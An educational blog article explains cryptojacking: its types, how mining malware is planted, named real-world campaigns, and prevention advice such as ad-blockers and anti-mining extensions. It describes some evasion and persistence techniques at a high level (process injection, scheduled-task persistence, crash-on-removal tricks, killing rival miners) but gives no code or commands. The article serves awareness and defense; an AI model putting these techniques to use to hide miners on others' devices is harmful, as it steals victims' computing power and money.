To understand the mechanism of cryptojacking and how to prevent it, let’s take a look at the following topics.
Take a look at this tutorial on blockchain technology by Intellipaat.
The motivation behind cryptojacking is pretty straightforward; it is money. While cryptocurrency mining can be very lucrative, generating a profit is next to impossible, especially, if there is no means to cover the large costs. For anyone with limited resources and fewer morals, cryptojacking is an effective, inexpensive way to mine valuable coins.
What is Cryptojacking?
Cryptojacking involves the unauthorized use of people’s devices to mine for cryptocurrency. Unlike other threats and cybercrimes, it is designed to stay hidden from the knowledge of the victim. Cryptojacking embeds itself within a device and uses its resources to mine cryptocurrency. To further understand the process of cryptojacking, let’s first, briefly revisit how cryptocurrency works.
Cryptocurrency is digital or virtual money, which is in the form of tokens or “coins”. Out of the 3,000 (approximately) forms of cryptocurrency, a popular one is Bitcoin Blockchain. While most remain virtual, some cryptocurrencies have ventured into the physical world through credit cards or other projects.
Cryptocurrencies use a distributed database also known as the blockchain. This blockchain is updated regularly with information about all transactions taking place.
Every set of recent transactions is combined into a ‘block’ with the help of a complex mathematical process. Once the block is filled with data it is chained onto the previous block, which means the data is linked or “chained” together chronologically.
In order to generate new blocks, cryptocurrencies depend on individuals for computing power. Those who supply computing power are rewarded with cryptocurrency. Individuals who trade computing resources for currency are known as miners.
When larger cryptocurrencies are involved, there are teams of miners that run dedicated computer rigs to perform the necessary mathematical calculations. This requires a significant amount of electrical power—for example, the bitcoin network consumes more than 73TWh of energy every year.
Types of Cryptojacking
There is more than one way for cryptojackers to maliciously mine for cryptocurrencies—downloading malware for the execution of crypto-mining scripts, accessing cloud services, and hijacking IT infrastructure.
File-based Cryptojacking
File-based cryptojacking involves malware that is downloaded to run an executable file. This file spreads a crypto mining script throughout the IT infrastructure. One of the most common ways of achieving this is through malicious emails.
An email containing a legitimate-looking attachment or link is sent. When any user clicks on that attachment or link, a code runs and installs the crypto mining script onto the computer. The script works in the background without the knowledge of the user.
Browser-based Cryptojacking
Cryptojacking also takes place directly within a web browser. In this type of attack, IT infrastructure is used to mine for cryptocurrency.
Hackers use a programming language to create a crypto mining script and then embed it into multiple websites. These malicious scripts can be embedded in ads and vulnerable and out-of-date WordPress plugins. The script is able to run automatically and downloads the code onto the user’s computer.
Cryptojacking can also be executed through a supply chain attack where the crypto mining code compromises JavaScript libraries.
Cloud Cryptojacking
In cloud cryptojacking, hackers search through the files and code for API keys of an organization to access their cloud services. Then, they siphon unlimited CPU resources for crypto mining, resulting in a huge increase in account costs. This significantly accelerates the efforts of cryptojacking to mine for currency illicitly.
How does Cryptojacking work?
Here are the mechanics and steps involved in the cryptojacking process:
1. Compromising an asset to embed crypto mining script: Cryptojackers compromise an asset by embedding a crypto-mining code.
2. Executing crypto mining script: Once embedded, cryptojackers wait for victims to execute the script. If users click on an attachment or link or browse to a website with infected ads, the crypto mining script is executed and run.
3. Cryptomining begins: The crypto mining script runs in the background after being executed without the knowledge of the user.
4. Solving algorithms: The crypto mining script uses up the computer power to solve complex algorithms to mine a block. These blocks are added to a blockchain that stores cryptocurrency information.
5. Receiving a cryptocurrency reward: Every time a new block is added to the chain, hackers receive cryptocurrency coins as a reward—without the need for too much work or risk. Cryptojackers gain the rewards in cryptocurrency, which is easy to anonymously add directly to their digital wallets.
Cryptojacking History
Cryptojacking first came to attention in the September of 2017 during the height of bitcoin. Coinhive published a code on their website, which was intended to be a mining tool for website owners to passively earn money as an alternative to website ads. However, it ended up being misused by cybercriminals to embed their own crypto mining scripts. The computing resources of website visitors were used to mine for Monero (cryptocurrency).
The Rise and Effects of Cryptojacking
Cryptojacking is slowly becoming a serious global problem. Cybercriminals have been attempting to gain access to computer systems to make money with minimal risk and effort. Hackers are coming up with new tactics and ways every day to steal computer resources and mine for cryptocurrencies.
Recently, hackers found a way to embed cryptojacking malware on YouTube. This makes it easy to trick users into clicking and activating the crypto mining scripts.
You might be thinking, how can a phone with minor processing power be any good? But when a large number of smartphones are involved, it all adds up to make it worth the cryptojackers’ attention. In fact, some cybersecurity experts have pointed out that unlike several other types of malware, cryptojacking scripts cause no harm to computers or victims’ data. However, it does have consequences that affect the performance of the victim’s computer or device.
On the contrary, if there are larger organizations involved rather than an individual victim of a drive-by cryptojacking, there are real costs that translate to IT labor costs, electricity costs, missed opportunities, and more.
Cryptojacking is becoming more popular because the software that is used to execute is easier to deploy and more difficult to detect. It doesn’t even require any kind of significant technical skills. Nowadays, premade software programs are easily obtainable on the dark web. The crypto mining code starts running in the background of an infected computer undetected for a long period of time.
Cryptojacking is very difficult to trace back to the hacker if detected and by that time, the hackers would have spent their digital loot, financially impacting the business through the damage caused to their systems.
Get 100% Hike!
Master Most in Demand Skills Now!
Real-world Cryptojacking Examples
Cryptojackers can be really clever when it comes to devising schemes to gain access to other peoples’ computers for crypto mining. Most methods are often from other types of malware like ransomware or adware. Following are some real-world examples:
The exploitation of Microsoft Exchange vulnerability by the Prometei cryptocurrency botnet
The Prometei is a modular and multi-stage botnet used for mining the Monero cryptocurrency. In early 2021, Cybereason discovered that the botnet was exploiting the Microsoft Exchange vulnerabilities. It used the infected devices to mine Monero.
Windows credentials stolen by spear-fishing PowerGhost
PowerGhost, first uses spear-phishing to gain access to a system, and then steals Windows credentials and leverages the EternalBlue exploit and Windows Management Instrumentation to spread. It then attempts to deactivate the antivirus software as well as competing crypto miners.
Graboid spread using containers
Graboid is a cryptojacking botnet that has self-spreading capabilities making it the first known crypto mining worm. It spreads by finding deployments of Docker Engine that are exposed to the internet without authentication. It is estimated that over 2,000 deployments were infected by Graboid.
Monero mined by malicious Docker Hub accounts
In June 2020, a cryptojacking scheme was identified that uses Docker images on the Docker Hub network for the delivery of crypto mining software to victims’ systems. This method helps avoid detection. Surprisingly, these infected images were accessed more than two million times, and the ill-gotten gains were estimated to be around $36,000.
MinerGate variant
A variant of the MinerGate malware family had been found to possess an interesting feature. It has the ability to detect mouse movements and suspend mining activities. This prevents the victims from being tipped off if there is a sudden drop in performance.
BadShell using Windows processes
Comodo Cybersecurity found malware on a client’s system that used legitimate Windows processes to mine cryptocurrency. BadShell uses:
- PowerShell script to inject the malware code into an existing running process
- Task Scheduler for persistence
- Registry for holding the malware’s binary code
Rogue employee commandeering company systems
A European bank experienced some unusual traffic patterns on its servers. The night-time processes were slow, and the diagnostic tools failed to detect anything out of the ordinary. A physical inspection of the data center led to the discovery of a crypto mining system under the floorboards set up by a rogue staffer.
Crypto mining using GitHub
Cryptojackers were using GitHub as a host for crypto-mining malware. They create forked projects from the legitimate ones that they find. They conceal the malware in the directory structure of the forked project. The cryptojackers lure people using a phishing scheme and trick them into downloading that malware.
Exploiting rTorrent vulnerability
Cryptojackers discovered an rTorrent misconfiguration vulnerability. This resulted in some exposed rTorrent clients without authentication for XML-RPC communication. When these clients are targeted, a Monero crypto miner is deployed onto these clients.
Facexworm: Malicious Chrome extension
Facexworm is a Google Chrome extension. It infects users’ computers by using Facebook Messenger. Initially, it delivered adware. Later, it started targeting cryptocurrency exchanges and delivering crypto-mining code. The malicious links are still delivered through infected Facebook accounts. It also has the ability to steal web accounts and credentials that allows injections of the cryptojacking code into those web pages.
WinstarNssmMiner: Scorched earth policy
Dubbed WinstarNssmMiner, this quick-spreading malware crashes the computer of anyone who tries to remove it: It accomplishes this by first launching an svchost.exe process and injecting a code into it. It sets the attribute of the spawned process to CriticalProcess. Since the computer thinks it is a critical process, it crashes once the process is removed.
CoinMiner destroying competitors
Hackers design malware to find and kill already-running crypto miners on the systems they infect. CoinMiner is one example. It checks for an AMDDriver64 process on Windows systems. Two lists, $malwares, and $malwares2 are within the malware and contain the process names that are part of other crypto miners. CoinMiner then kills these processes.
Compromised MikroTik routers spread cryptominers
Over 80 cryptojacking campaigns were targeting MikroTik routers, and a large number of devices were compromised. These campaigns exploited a CVE-2018-14847 known vulnerability, for which MikroTik had provided a patch. Since MikroTik produces carrier-grade routers, the perpetrators get broad access to target systems.
How to prevent Cryptojacking?
Detecting when a system has been compromised by cryptojacking is difficult, but ensuring there are preventative measures in place can protect computers, networking systems, or crypto-assets:
Training IT Teams
IT teams should be trained to skillfully detect cryptojacking and be aware of signs of an attack at all times so that immediate actions can be taken to further the investigation.
Educating Employees
Since IT teams rely on employees to know whenever there are systems that are running slowly or overheating, the employees need to be made aware of such symptoms that can hinder cybersecurity. They need to be educated to not click on random links in emails unless from a trusted source. The same applies to personal emails as well.
Making Use of Anti-Cryptomining Extensions
Browser extensions can keep cryptominers at bay. Since web browsers are oftentimes a preferred platform by attackers for cryptojacking script deployment, it is essential to use anti-crypto mining extensions. Anti-Miner, MinerBlock, No Coin, etc. are some examples of such extensions that can be used.
Using Ad-Blockers
Web ads are also another common means for cryptojacking scripts to be embedded. So, the best preventive measure, in this case, is using an ad-blocker as it has the ability to both detect and block malicious crypto-mining codes.
Disabling JavaScript
Disabling JavaScript when browsing online can prevent cryptojacking codes from infecting your system. However, bear in mind that doing so will also block many of the functions that are required while browsing.
Key Takeaways
Like other forms of cybercrime, the motive of cryptojocking is profit. However, unlike most threats, it is designed to stay undetected from the victim. The cryptojacking code uses just enough system resources to remain unnoticed by the user. Therefore, it is important to be careful and aware when your system is not operating smoothly as the only sign of cryptojacking that is noticeable is slower performances or lags in execution.